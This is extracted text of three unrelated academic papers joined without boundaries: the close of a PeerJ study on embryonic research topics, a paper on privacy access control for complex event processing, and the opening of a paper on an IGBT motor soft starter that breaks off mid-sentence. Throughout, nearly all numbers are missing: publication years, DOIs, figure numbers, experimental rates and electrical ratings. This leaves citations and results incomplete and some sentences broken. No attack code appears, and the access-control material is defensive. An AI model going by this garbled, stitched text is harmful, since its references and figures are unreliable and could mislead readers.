topics, since it requires knowledge of the set of topics with which the embryonic topic will co-occur in the future. however, this could be fixed by developing techniques that are able to select promising subgraphs according to their collaboration pace and density. for this purpose we are currently developing an approach that generates a topic graph in which (i) links are weighted according to the acceleration in the pace of collaboration between the two relevant topics and (ii) community detection algorithms are applied to select portions of the network characterized by an intense collaboration between topics. we expect that this solution will be able to detect at a very early stage that ‘something’ new is emerging in a certain area of salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the topic graph, even if it may not be able to accurately define the topic itself. it would thus allow relevant stakeholders to react very quickly to developments in the research landscape. the findings of this analysis also provide contributions of potential value to research in philosophy of science. firstly, they appear to support our hypothesis about the existence of an embryonic phase in the lifecycle of research topics. secondly, they bring new empirical evidence to fundamental theories in philosophy of science, which are concerned with the evolution of scientific disciplines, e.g., herrera, roberts & gulbahce ( ), kuhn ( ), nowotny, scott & gibbons ( ), and sun et al. ( ). finally, they highlight that new topics tend to be born in an environment in which previously less interconnected research areas start to cross-fertilise and generate new ideas. this suggests that interdisciplinarity is one of the most significant forces that drives innovation forward, allowing researchers to integrate a diversity of expertise and perspectives, and yield new solutions and new scientific visions. hence the results of our analysis could be used to support policies that promote interdisciplinary research. conclusions we hypothesised the existence of an embryonic phase for research topics, where, while they have not yet been consistently labelled or associated with a considerable number of publications, they can nonetheless be detected through an analysis of the dynamics of already existing topics. to confirm this hypothesis, we performed an experiment on debutant topics in computer science, which led to the analysis of a topic network comprising about , topics extracted from a sample of three million papers in the – time interval. the results confirm that the creation of novel topics is anticipated by a significant increase in the pace of collaboration and density of the portions of the network in which they will appear. these findings provide supporting evidence for the existence of an embryonic phase for research topics and can be built on to foster further research to develop new techniques for the detection of topics at this stage. they also bring new empirical evidence to theories in philosophy of science. finally, they suggest that an interdisciplinary environment provides a fertile ground for the creation of novel research topics. we now plan to exploit the dynamics discussed in this study to create a fully automatic approach for detecting embryonic topics. we also intend to study and integrate additional dynamics involving other research entities, such as authors and venues. the aim is to produce a robust approach to be used by researchers and companies alike for gaining a better understanding of where research is heading. additional information and declarations funding phd studentship for angelo a. salatino is funded by springer. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: springer. competing interests the authors declare there are no competing interests. author contributions • angelo a. salatino conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • francesco osborne conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • enrico motta wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: open science framework: https://osf.io/bd ex/. references becher t, trowler p. . academic tribes and territories: intellectual enquiry and the culture of disciplines. new york: mcgraw-hill education (uk). berners-lee t, hendler j, lassila o. . the semantic web. scientific american : – . blei dm, lafferty jd. . correlated topic models. in: weiss y, schölkopf pb, platt jc, eds. advances in neural information processing systems, vol. , – . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research : – . bolelli l, ertekin Ş, giles cl. . topic and trend detection in text collections using latent dirichlet allocation. in: proceedings of the th european conference on ir research on advances in information retrieval , ecir’ . berlin, heidelberg: springer- verlag, – . boyack kw, klavans r, börner k. . mapping the backbone of science. scientomet- rics : – doi . /s - - - . cano basave ae, osborne f, salatino aa. . ontology forecasting in scientific literature: semantic concepts prediction based on innovation-adoption priors. in: knowledge engineering and knowledge management: th international conference, ekaw , bologna, italy, proceedings. new york: springer international publish- ing, – . cataldi m, di caro l, schifanella c. . emerging topic detection on twitter based on temporal and social terms evaluation. in: proceedings of the tenth international workshop on multimedia data mining. acm, p . salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://osf.io/bd ex/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. chang j, blei dm. . hierarchical relational models for document networks. the annals of applied statistics ( ): – . chavalarias d, cointet j-p. . phylomemetic patterns in science evolution—the rise and fall of scientific fields. plos one :e doi . /journal.pone. . couvalis g. . the philosophy of science: science and objectivity. thousand oaks: sage. davis ja, leinhardt s. . the structure of positive interpersonal relations in small groups. washington, d.c.: institute of education sciences. decker sl, aleman-meza b, cameron d, arpinar ib. . detection of bursty and emerging trends towards identification of researchers at the early stage of trends. athens: university of georgia. duvvuru a, kamarthi s, sultornsanee s. . undercovering research trends: network analysis of keywords in scholarly articles. in: computer science and software engi- neering (jcsse), international joint conference on. – . duvvuru a, radhakrishnan s, more d, kamarthi s, sultornsanee s. . analyzing structural & temporal characteristics of keyword system in academic research articles. procedia computer science : – doi . /j.procs. . . . erten c, harding pj, kobourov sg, wampler k, yee g. . exploring the computing literature using temporal graph visualization. electronic imaging : – . faust k. . a puzzle concerning triads in social networks: graph constraints and the triad census. social networks : – doi . /j.socnet. . . . fusch pi, ness lr. . are we there yet? data saturation in qualitative research. the qualitative report ( ): – . griffiths tl, jordan mi, tenenbaum jb, blei dm. . hierarchical topic models and the nested chinese restaurant process. in: thrun s, saul lk, schölkopf pb, eds. advances in neural information processing systems, vol. . cambridge: mit press, – . gruhl d, guha r, liben-nowell d, tomkins a. . information diffusion through blogspace. in: proceedings of the th international conference on world wide web. – . he q, chen b, pei j, qiu b, mitra p, giles l. . detecting topic evolution in scientific literature: how can citations help? in: proceedings of the th acm conference on information and knowledge management. new york: acm, – . herrera m, roberts dc, gulbahce n. . mapping the evolution of scientific fields. plos one :e doi . /journal.pone. . holland pw, leinhardt s. . local structure in social networks. sociological method- ology : – doi . / . jo y, lagoze c, giles cl. . detecting research topics via the correlation between graphs and texts. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . kamaliha e, riahi f, qazvinian v, adibi j. . characterizing network motifs to identify spam comments. in: ieee international conference on data mining workshops. piscataway: ieee, – . salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. kuhn ts. . the structure of scientific revolutions. chicago: university of chicago press. larsen po, von ins m. . the rate of growth in scientific publication and the decline in coverage provided by science citation index. scientometrics : – doi . /s - - -z. leydesdorff l. . betweenness centrality as an indicator of the interdisciplinarity of scientific journals. journal of the american society for information science and technology : – doi . /asi. . luce rd, perry ad. . a method of matrix analysis of group structure. psychometrika : – doi . /bf . lv ph, wang g-f, wan y, liu j, liu q, ma f-c. . bibliometric trend analysis on global graphene research. scientometrics : – doi . /s - - -x. mathioudakis m, koudas n. . twittermonitor: trend detection over the twitter stream. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . morinaga s, yamanishi k. . tracking dynamics of topic trends using a finite mixture model. in: proceedings of the tenth acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . newman me. . the structure of scientific collaboration networks. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . . . nowotny h, scott pb, gibbons mt. . re-thinking science: knowledge and the public in an age of uncertainty. hoboken: john wiley & sons. o’callaghan d, harrigan m, carthy j, cunningham p. . identifying discriminating network motifs in youtube spam. arxiv preprint. arxiv: . oka m, abe h, kato k. . extracting topics from weblogs through frequency seg- ments. in: proceedings of www annual workshop on the weblogging ecosystem: aggregation, analysis, and dynamics. osborne f, motta e. . mining semantic relations between research areas. in: cudré- mauroux p, heflin j, sirin e, tudorache t, euzenat j, hauswirth m, xavier parreira j, hendler j, schreiber g, bernstein a, blomqvist e, eds. the semantic web—iswc . iswc . lecture notes in computer science, vol. . berlin, heidelberg: springer. osborne f, motta e. . klink- : integrating multiple web sources to generate semantic topic networks. in: arenas m, corcho o, simperl e, strohmaier m, d’aquin m, srinivas k, groth p, dumontier m, heflin j, thirunarayan k, staab s, eds. the semantic web—iswc . lecture notes in computer science, vol. . cham: springer. osborne f, motta e, mulholland p. . exploring scholarly data with rexplore. in: the semantic web—iswc . berlin, heidelberg: springer. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /asi. http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /pnas. . . http://arxiv.org/abs/ http://dx.doi.org/ . /peerj-cs. osborne f, scavo g, motta e. . a hybrid semantic approach to building dynamic maps of research communities. in: janowicz k, schlobach s, lambrix p, hyvönen e, eds. knowledge engineering and knowledge management. ekaw . lecture notes in computer science, vol. . berlin, heidelberg: springer. pham mc, klamma r, jarke m. . development of computer science disciplines: a social network analysis approach. social network analysis and mining : – doi . /s - - -x. pržulj n. . biological network comparison using graphlet degree distribution. bioinformatics :e –e doi . /bioinformatics/btl . rosen-zvi m, griffiths t, steyvers m, smyth p. . the author-topic model for authors and documents. in: proceedings of the th conference on uncertainty in artificial intelligence. arlington: auai press, – . salatino a. . early detection and forecasting of research trends. in: iswc-dc the iswc doctoral consortium. available at http://ceur-ws.org/vol- /paper_ .pdf . salatino aa, motta e. . detection of embryonic research topics by analysing semantic topic networks. in: workshop on semantics, analytics, visualisation: enhancing scholarly datae (save-sd ). cham: springer. sun x, ding k, lin y. . mapping the evolution of scientific fields based on cross- field authors. journal of informetrics : – doi . /j.joi. . . . sun x, kaur j, milojević s, flammini a, menczer f. . social dynamics of science. scientific reports : doi . /srep . tseng y-h, lin y-i, lee y-y, hung w-c, lee c-h. . a comparison of methods for detecting hot topics. scientometrics : – doi . /s - - -x. ugander j, backstrom l, kleinberg j. . subgraph frequencies: mapping the empirical and extremal geography of large graph collections. in: proceedings of the nd international conference on world wide web: international world wide web conferences steering committee. – . wu y, venkatramanan s, chiu dm. . research collaboration and topic trends in computer science based on top active authors. peerj computer science :e doi . /peerj-cs. . salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /bioinformatics/btl http://ceur-ws.org/vol- /paper_ .pdf http://ceur-ws.org/vol- /paper_ .pdf http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /srep http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a cep privacy security access control framework based on event attribute detecting tree bo hong* school of computer science and engineering, xi’an technological university, xi’an, , china e-mail: @qq.com xin jing school of computer science and engineering, xi’an technological university, xi’an, , china abstract—complex event processing (cep) technology is a study focus in the data flow processing area, while privacy security protection is the key problem that needs to be solved. in order to prevent illegal users from acquiring any information via registered event patterns, this paper discusses the cep privacy security access control object in depth, formally defines four types of event attribute operators including completely read, partially read, access denied and quantity statistics, presents a privacy security protection engine with the event attribute detecting tree as the operating mechanism and puts forward a new feasible cep privacy security access control framework based on this. the experimental result shows that such framework is able to realize efficient privacy information filtration based on the user role to reach the goal of cep detecting information processing in a safe manner. keywords-complex event processing; privacy security access control; event attribute detecting tree; event attribute operator; security protection engine i. introduction data flow processing is a very important and active area in modern database technology. cep technology[ ] has become the study focus of such field since its inception as it is capable of integrating the information from the numerous data source distributed and digging the valuable dynamic meaning among the information from the high-speed data flow in real time. cep technology is thoroughly changing the way of subscription & distribution and application data of the traditional information system. it acts as the hub of information fusion and dispersion by uncoupling the information provider and recipient and playing the roles including information observer, analyst and decision maker. as the internet of things sensor and the network based new application quantity surge, the information capacity to be processed sees an explosive growth trend. thus, cep technology is increasingly becoming an essential tool in many application fields. however, for most cep engines at present, the processes and content of the complex event processing and output are open. that is to say, not only legal advanced application can utilize the cep engine to obtain valuable information, but also illegal users are also able to acquire any necessary information for their criminal behaviors. this presents the cep technology with huge responsibility with respect to the privacy security protection in detecting information. up to now, there are few studies on cep privacy security access control, thus the research result in such aspect is just in the initial stage. in order to hold back over-class information access, literature [ ] conducts security access expansion for the cep detection and event model, which effectively prevents the unauthorized information from being leaked or tampered to the outside. it first increases two attribute fields, i.e. "security level" and "current stage", behind the traditional event model, and then adds security level checker in the query matching tree. the checker allows the event the security level of which is lower than the level set by this query matching tree to inflow so as to realize access control of the information at different security levels. literature[ , ]designs a set of novel security access operators and comes up with a re-query method based on such operator set with the relation algebra and query graph model of aurora as well as the view idea of the traditional international journal of advanced network, monitoring and controls volume , no. , database management system. through this method, the security access operators are able to be inserted to the aurora query graph model in the most effective way. as a result, cep can perform security access control on the data flow in pursuant to the predefined security strategy file. the above studies share the same thought, i.e. rewrite the query of the cep event pattern, adjust the original performing structure, and insert specialized security detecting unit to form an operation structure combining security and the original detection pattern. such kind of method is complex and has some deficiencies. . users have different security strategies, thus it is necessary to save all relevant user security strategies in the security detection unit when performing multiple user security strategies in one cep query, which obviously will cause logical mess in the course of performance. . the newly added security detection unit will produce more work load in the process of cep detection and influences its execution efficiency, meanwhile the mixed operation structure will be hard to be optimized (e.g. share intermediate result). in order to avoid the above problems, this article will put forward an efficient cep privacy security access control framework that is feasible and easy to be integrated. ii. cep privacy security access control object the basic unit of cep processing work is event. thus, the content of its privacy security access control is the information included in the event. according to the event model definition provided by the author in the early stage of the study (event_model:= event_type @ (attribute_name[data_type]n) n≥ ;), event is a tuple composed of n attributes (a ,…,an) and attribute field is the minimum unit saved by the information value. therefore, this paper determines event attribute as the object of cep privacy security access control and explain its concept in the form of definition. definition event attribute it specifies that each event flow stri input into the cep engine contains one type and can only contain one type of event etj. certain event type etj is made of n attributes pk k≥ . p(stri) represents the set of all attributes included in certain event flow stri and p(etj) represents the set of all attributes included in certain event type etj, then p(stri)=p(etj) if etj∈stri. in addition, in this paper, stri.pk (or etj.pk) represents certain attribute in certain event flow (or certain event type). the user's access right to the event attribute (etj.pk|stri.pk) content meets four cases: completely read, partially read, access denied and quantity statistics. therefore, a formalized description of such four types of access control operator is firstly given. completely read operator ξ: ξ(p(eti))|ξ(p(stri)) represents complete access control right to the event attribute information in the event type (or event flow). it can be abbreviated as ξ(eti)|ξ(stri). ξ can be used for some attributes set of the event type (or event flow), ξ(eti[p ,p ,…]) p ,p ,…∈p(eti) means only the information content of some attributes (p ,p ,…) in the event type is allowed to be accessed. partially read operator ф: ф(expr)(eti)|ф(expr)(stri) means the event attribute information in the event type (or event flow) can be accessed as per the definition of the conditional expression set expr. the expression expri in expr expression set only exists as conjunction relationship, e.g. eti.location=“l ”∧ eti. temperature> , means the location attribute of such event is l , and the temperature value attribute is greater than . access denied operator ψ: ψ(p(eti))|ψ(p(stri)) represents complete denial of the access to the event attribute information in the event type (or event flow). it can be abbreviated as ψ(eti)|ψ(stri). likewise, operator ψ can also only deny the access to some attributes, ψ(eti[p ,p ,…]) p ,p ,…∈p(eti) means only the information content of some attributes (p ,p ,…) in the event type is denied to be accessed. quantity statistics operator Ω: this access operator corresponds to aggregate operations that do not care the specific value of the event attribute but concern the total number, mean value and other statistics information of the event. Ω(f(pk))(eti)|Ω(f(pk))(stri) means it has statistical right to the event attribute pk in the event type (or event flow), of which, f is calculation function, including min, max, count, avg and sum, etc. international journal of advanced network, monitoring and controls volume , no. , in pursuant to the above formalized description of the control operators of security access to event attribute (record all operators set Э), the content to which the user may have privacy security access for the cep input event flow should substantially be the result of Э operation on the input event flow by such user. that is to say, only the information in line with the given user security strategy is filtrated. based on this, this article defines cep privacy security access control object as follows. definition privacy security access control object the privacy security access control object in cep engine is, of which, strs is the input event flow set of the cep engine, Э is the set of the security access control operators of event attribute, and pi is the event attribute set in the event flow. event attribute privacy security access operator Э event attribute object strs.atts hierarchy role authorize users allot figure . privacy security access control model as shown from the above definition, when allocating security access control right to a user, the system administrator needs to explicitly designate the privacy security protection object to which such user can access for such user, i.e. designate the access right to each event attribute content for such user. this will bring huge work load for the system administrator. in order to operate flexibly and conveniently as well as reduce the work load on right allocation, this paper divides the security access control right of users based on the rbac model and hierarchy role thought. as shown in fig. , hierarchy role applies tree structure. high level role may include several predecessor roles and will automatically inherit the security access rights of all predecessor roles to event attribute. similarly, a user instance may have one or more role identities so as to realize flexible role allocation. iii. cep privacy security access control frame according to the above privacy security access control object, this paper presents cep security access control framework (cep-sacf) as shown in fig. . cep-sacf is easy to be realized without changing the original cep implementation structure. senior manager privacy protection object system user common user privacy protection engine privacy protection engine system user cep pattern execution space designate assign access control register register login login common user cep pattern execution space cep gui e v en t st re am b u s figure . cep privacy security access control framework international journal of advanced network, monitoring and controls volume , no. , cep-sacf operation includes three stages, i.e. user role authorization, pattern registration and privacy security access control. first of all, at the user role authorization stage, senior system administrator defines the privacy security access control object, designates corresponding security access operation to the event attribute requiring privacy protection and allocates it to the designated user role (user role is planned by level,[ , ]to reduce authorization work load); then, the user logs in with the role allocated and enters cep engine management interface where user may define its own business rule with cep event pattern language[ ], cep manages gui and will correlate the security rules related to such user role in the privacy security access control object strategy file to detect the legality of the event pattern to be registered. if there is no conflict of security rules, then such event pattern will be registered in the independent implementation space of such user role (at the time of the first registration, an independent operation space should be firstly created for such user role, and the event pattern hereafter will be registered under the namespace with the same name as the registered user role). if the event attribute content requested by the event pattern to be accessed is in conflict with the privacy security rules of this role, then a prompt of limited user right will show and registration of such event pattern will be denied; finally, the independent privacy security protection engine will operate between the input event flow and cep engine. each pspe just saves the privacy security rules related to such user role and will make operations of permission (completely read operator ξ), rejection (access denied operator ψ), filtration (partially read operator ф) or modification (quantity statistics operator Ω) for the event attribute in accordance with the definition of privacy security access operator of event attribute Э. the event processed by operator Ω will be repacked. for example, certain event contains (id, timestamp, location) attribute previously and such event only permits calculate the total number (perform Ω operation for its id attribute). other attributes are private information that is not permitted to be accessed. then under the function of operator Ω, pspe will allow all such events to pass with the private information contained flowing through the event removed. a new event only containing id attribute will be generated. then it will be sent to the corresponding operation space. furthermore, in order to ensure security of cep output result, pspe will also receive the output in the operation space protected by it and send the result to the user within the user role of such space. to ensure that under the registered event pattern, the user will not acquire the privacy security access right designated to such user role beyond the senior administrator and guarantee the efficiency of legal detection, this article verify the event pattern registered by the user with the following algorithm. algorithm validity verification algorithm of cep privacy security access control in event pattern input: the event pattern declared by the user and user role; output: the event attribute array nprops[] without legal access right in the event pattern definition; . if (find prop.aggregation(*) in event_pattern)==true props<string,string>.put(eventtype,aggregation_operator_name); . iterator (expression in where clause ) { eventtype=get_eventtype(in expression); property=get_ property(in expression); props<string,string>.put(eventtype, property);} . for(map.entry<string, string> entry:props.entryset()){ select * from secunity_rule where user_role=login_user_role; for( dataset.hasnext() ){ if (dataset[i].eventproperty==entry.getkey()) if (nolegality(dataset[i].accessoperator,entry.getvalue())==ture) nprops[entry.getvalue()];}} . system.out.println(nprops[]); international journal of advanced network, monitoring and controls volume , no. , iv. privacy security protection engine (pspe) pspe is independently created with cep event pattern implementation space. its content is determined by the privacy security access control rules defined by the senior system administrator and automatically updated depending on the adjustment of the rules. the basic mechanism of pspe operation is copy, i.e. regard the event flow input into cep engine as data bus and send the copy of the event in line with the privacy security protection rules on the data bus to the event pattern detection network inside the operation space. beyond that, no operation will be made. this mechanism can effectively guarantee the event flow will flow through all privacy security protection engines and finally pass the event containing correctly authorized information to cep processing nodes. the working principle inside pspe is shown in fig. . it will convert the filtration operation of the event attribute to the tree structure with the event type as the root node, of which, eventtype is the event type that can be processed in this space. the subnode under the root node of the event type is the event type included. the event attribute node will be included in the access operation defined in the privacy security protection rules (as one event attribute can only define one type of security access operation type, the event attribute node only contains one subnode). here are some kinds of common detecting tree in pspe. as shown in fig. (a), suppose certain event type contains three event attributes and for certain user role, these three event attributes are all permitted to be accessed, thus the combined node will pass such event to the internal implementation space completely. it is contrary in fig. (b) where the three attributes of the event are denied to be accessed, and such event will not be passed internally. fig. (c) shows the general situation under privacy security access control, i.e. user role is only allowed to access to some attribute content of one event while the private part is not permitted to be viewed. as attr attribute is denied to be accessed, the node of such detecting tree will only combine attr and attr attributes and outputs a new event which only contains these two attributes. fig. (d) displays the appearance of the detecting tree which conditionally reads the event attribute, of which, the condition verification includes single value comparison (as shown in figure (e), the comparison content: attr = value && attr != value ) and multiple value comparison (as shown in fig. (d), the comparison content: value <attr < value ). the node will only allow the event whose comparison result is true to pass through. fig. (f) shows the situation of event attribute statistics and calculation. the node will permit such event attribute content to be accessed and the function of node Ω is equivalent to ξ. as known from the above common detecting tree structure, pspe is able to effectively prevent the unauthorized information from inflowing and using. by means of repackaging the event, the separation of the authorized and unauthorized information can be guaranteed. international journal of advanced network, monitoring and controls volume , no. , event type attr ξ ξ ξ attr attr attrs∪ event type attr ψ ψ ψ attr attr event type attr ξ ψ ξ attr attr attrs∪ event type attr Ω ψ ф attr attr attrs∪ [=,value ] (a) (b) (c) (f) event type attr ξ ф ξ attr attr attrs∪ [<,value ] [>,value ] (d) event type attr ф ξ ф attr attr [=,value ] [!=,value ] (e) attrs∪ figure . detection tree structure in privacy security protection engine v. performance test of privacy security access control framework the core part of cep-sacf operation is pspe, the operation performance of which is related to the input event flow rate and the total quantity of the internally registered detecting tree (record such parameter as ets). the above content shows that the working efficiency of the detecting tree is related to the number of internal event attribute node (record such parameter as ats) and the node type of the access operator (record such parameter as ops). therefore, this group of experiment will test the three parameters that influence the efficiency of the engine respectively. first of all, simulate the input event flow, each of which only contains one type of event. each event is composed of one event type attribute field and several other attribute fields. the event flow generator will utilize multiple courses to produce event flow in parallel and send it out to simulate real scene. then, the buffer queue of pspe will receive these events and conduct security detection by the first-in-and-first-out sequence. the detecting tree indexes with the hash table and realizes it with the custom tree structure. international journal of advanced network, monitoring and controls volume , no. , (a) experiment influence of detection tree number (b) experiment influence of event attribute number (c) event attribute security access operator efficiency test figure . privacy security protection engine performance testing experiment i registers three groups of ets={ , , } with different quantity for contrast. it receives data at , - , events/s and provides that the attribute quantity included in all events of such group of experiment is . the event attribute access operator is completely read operator ξ. as known from fig. (a), as the input rate increases, the time taken by pspe presents a linear growth trend, but the rise of total ets has little influence on pspe implementation efficiency because hash index has a high efficiency. the growth of total ets has little influence on its index rate. experiment ii tests the three control groups in which the attribute quantity of the event is ats={ , , }. the total detecting tree registered in such group of experiment is ets= (thus, the actual total number of the attribute detecting tree in pspe is , and , respectively). also, it receives data at , - , events/s and provides that the event attribute access operator of all attributes is completely read operator ξ. as known from fig. (b), parameter ats has a great influence on the implementation efficiency of pspe. as the total ats increases, the calculated amount of the traversal node inside pspe will undergo a cumulative rise. the processing time taken by the three control groups basically keeps a multiple relationship. the total consuming time of pspe is at millisecond level, which has little influence on the overall operation efficiency of cep-sacf. experiment iii tests the performance of ξ, ф and ψ (as Ω and ξ is different in function, repeated test will not be done for Ω). this group of experiment provides ets= , ats= , ops={ξ, ф, ψ}, with the data flow rate the same as above. the conditional expression of ф is [>, ]. that is to say, in spite of conditional judgment, all events are permitted to pass through. according to fig. (c), as ψ denies events to pass through and there is no subsequent treatment. thus, it consumes the shortest time (only including the time consumed in event type node searching and event attribute transversing). ф has calculation of conditional judgment on its node, so it consumes more time than the benchmark ξ operation. however, they come to the same conclusion that for different operators at different input rate, the total time international journal of advanced network, monitoring and controls volume , no. , consumed in processing by pspe can still keep at millisecond level, which represents high operation efficiency. vi. conclusion the experimental result shows that pspe has a high implementation efficiency. at the same time, it is able to deal with different user roles in different ways, filtrate the event information not allowed to be accessed and generate new events in line with privacy security access control requirement. thus, it has a feature of customizability. in addition, pspe is completely integrated outside of cep engine, which is very feasible because it has no influence on its original implementation structure and operation efficiency. it has certain application value by effectively making privacy security detection on the event information input/output cep engine. acknowledgment this work was supported by the industrial research project of science and technology department and the office of education of shaanxi province(grant no. ktzdgy - , jz ), and the xi'an technological university principal fund (grant no. xagdxjj ). references [ ] luckham d. the power of events: an introduction to complex event processing in distributed enterprise systems[m]. springer, . [ ] buddhika t, ray i, linderman m, jayasumana a. secure complex event processing in a heterogeneous and dynamic network[c]. spie defense+ security, international society for optics and photonics, : - . [ ] carminati b, ferrari e, tan k l. enforcing access control over data streams[c]. proceedings of the th acm symposium on access control models and technologies, acm, : - . [ ] carminati b, ferrari e, cao j, tan k l. a framework to enforce access control over data streams[j]. acm transactions on information and system security (tissec), , ( ): . [ ] tang jin-peng, li ling-lin, yang lu-ming. user attributes oriented rbac model[j]. computer engineering and design, ,( ): - . [ ] xiong hou-ren, chen xing-yuan, zhang bin, yang yan. security principles for rbac-based authorization management[j]. computer science, , ( ): - . [ ] jing xin, zhang jing. research on parallel cep processing with the multi-event pattern shareing capability[j]. journal of xi' an technological university, , ( ): - . international journal of advanced network monitoring and controls volume , no. , the design of two phase chopping regulation voltage soft starter jingwen chen*, hongshe dang school of electrical and information engineering, shaanxi university of science & technology, xi’an, , china *address correspondence to this author at xuefu road, xi’an, china. postcode: e-mail: @ .com abstract. as for the complexity of the trigger pulse control method for the generally-used thyristor soft starter, the poverty of the continuity of the stator current, the shortage of the waveform distortion and the higher harmonic content. a type with igbt to realize ac chopping regulation voltage soft starter has been designed,using the two-phase ac power control to achieve the aim of three-phase ac power control,ensuring the effect and saving the costs. the paper makes use of the matlab to analyze of the two phase chopping regulating all control type soft starter start performance with simulation, and designs the soft starter of the hardware circuit and the software programs. keywords: igbt, two phase chopping, asynchronous motor, soft starter . introductiong in the application of the motor, the starting of the motor problem is particularly important. when the asynchronous motor starts, transient current shock is large, generally up to ~ times than the motor rated current, and even larger. too large starting impact current will cause adverse effect on the motor itself, the normal operation of the other electrical equipment and power grid. because of the half control of thyristor, the discontinuous current, currently used thyristor voltage regulation of the soft starter will produce a lot of low harmonic, causing harmonic pollution, making the output voltage waveform distort serious and influencing the dynamic characteristics of the motor[ - ]. because of using all control devices, the two phase chopping regulating all control type soft starter can be shut off by self and can achieve the stator voltage stepless regulation by changing duty ratios of the trigger pulse. its advantage is that igbt trigger pulse does not need to link the phase of the three-phase bus voltage, and has no need to test the zero crossing point. it regulates voltage by adjusting the duty ratios of trigger pulse without calculating the firing angle; the control algorithm and the implementation method are relatively simple. in the use of the freewheeling circuit, the motor current and voltage waveform become much closer to the sine wave, and the waveform distortion rate becomes low [ - ]. . the main circuit of two phase chopping regulating soft starter the two phase chopping regulating all control type soft starter is by controlling the duty ratio of all control devices igbt trigger pulse to adjust the input voltage of stator from power grid, so as to adjust the size of the starting electromagnetic torque. specifically it’s adjusting the three-phase output voltage size by controlling the output voltage of the two phase. the main circuit topology structure is shown in the design of two phase chopping regulation voltage soft starter fig. the specific voltage regulation methods are as follows: the main circuit structure adopts four power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form two groups of basic single-phase ac voltage regulation circuit ( ), ( ), respectively concatenated in the power supply phase a and phase b of the three-phase ac asynchronous motor. in addition, it adopts six power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form a three-phase freewheel bridge ( ). the three-phase freewheel bridge connects ac voltage regulation circuit to three-phase ac asynchronous motor stator winding. in order to detect and control the starting current, set up current transformer ( ), ( ), ( ) to a, b, c phase power line of the three-phase ac asynchronous motor respectively. then the current signal tested by the current transformer will be send to the microprocessor control system ( ). on the main circuit control, the control pulse generated by the microprocessor control system has two ways, one triggers the insulated gate bipolar transistor ( ), ( ) of two sets of ac voltage regulation ( ), ( ) shown in diagram, the other triggers the insulated gate bipolar transistor ( ) of the three-phase freewheel bridge dc side. the positive and negative of these two pulses are exactly opposite, and they are complementary pulse. therefore, when ( ), ( ) trigger on, ( ) shuts off , then three-phase ac power supplies to three-phase ac asynchronous motor; when the ( ), ( ) shut off, ( ) triggers on, then three- phase ac asynchronous motor stator current follow current by three-phase freewheel bridge. figure. the main circuit structure of two phase chopping regulating soft starter . start modes the soft starter has a variety of start modes: voltage ramp start, voltage ramp start with pulse kick, current-limiting start, dual ramp start, etc. the maximum allowable time during start process can be set as starting time parameter, and starting time limit range is: - s, the default value is s. the start-up way is as follows: for voltage ramp start, the user can set up an initial starting torque, and this initial starting torque corresponds to an initial starting voltage. the voltage of the motor increases at a fixed growth rate from the initial starting voltage by a constant speed, until up to the rated voltage. and the growth rate of voltage can be adjusted to adapt to different starting times. a b c m a b c ( ) mcu ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) d d d d d d d d d d d d d d ( ) ( ) ( ) ( ) international journal of advanced network monitoring and controls volume , no. , voltage ramp start with pulse kick is the mode that gives the motor with a higher starting voltage for a short period of time in the motor starting moment, making the motor produce a large instantaneous torque to overcome the static friction torque under the static state, and making the motor turn up. its main application is on overloading starting motor. current-limiting start provides the motor decompression start with a fixed current, used to limit the maximum starting current, which is mainly used in the occasion of the need to limit the impact current when starting[ - ]. current-limiting start needs to cooperate with the effective value of current detection circuit. the program contains the pid current limit control algorithm, fuzzy control algorithm or combining fuzzy and pid control algorithm, etc. [ ], which makes the motor current won’t exceed the maximum value during the process of start, as the voltage ramp starts without a maximum value range, providing a kick torque start. the current-limiting start current limit value can be set in ~ times of the rated current. dual ramp start, similar to voltage ramp start, corresponds to two different rates of voltage rise. these two start solutions are set in advance. according to their practical application , users could store two commonest start modes in the soft starter, in order to set the starting parameters quickly to start motor. slope starts from % of the full voltage, lasts s, and linear increases to full voltage. slope starts from % of the full voltage, lasts s, and linear increases to full voltage. the motor can also firstly start by the slope . the initial torque is higher, but the voltage rise slowly, which makes the current of the motor change not severe. when the motor speeds up, the current will be reduced, making the motor rise to full voltage rapidly, and completing the start. . the simulation analysis of two phase chopping regulating all control type soft start based on the main circuit of two phase chopping regulating all control type soft starter shown in the figure. , the simulation model shown in fig. is built. simulation parameter settings are as follows: igbt switching frequency is khz, trigger pulse duty ratio . , three-phase ac power source v, hz, asynchronous motor rated power kw , rated voltage v, rated frequency hz,and the load torque n•m. figure. the main circuit model of two phase chopping regulating soft starter the design of two phase chopping regulation voltage soft starter the stator current simulation result of two phase chopping regulating all control type soft starter is shown in 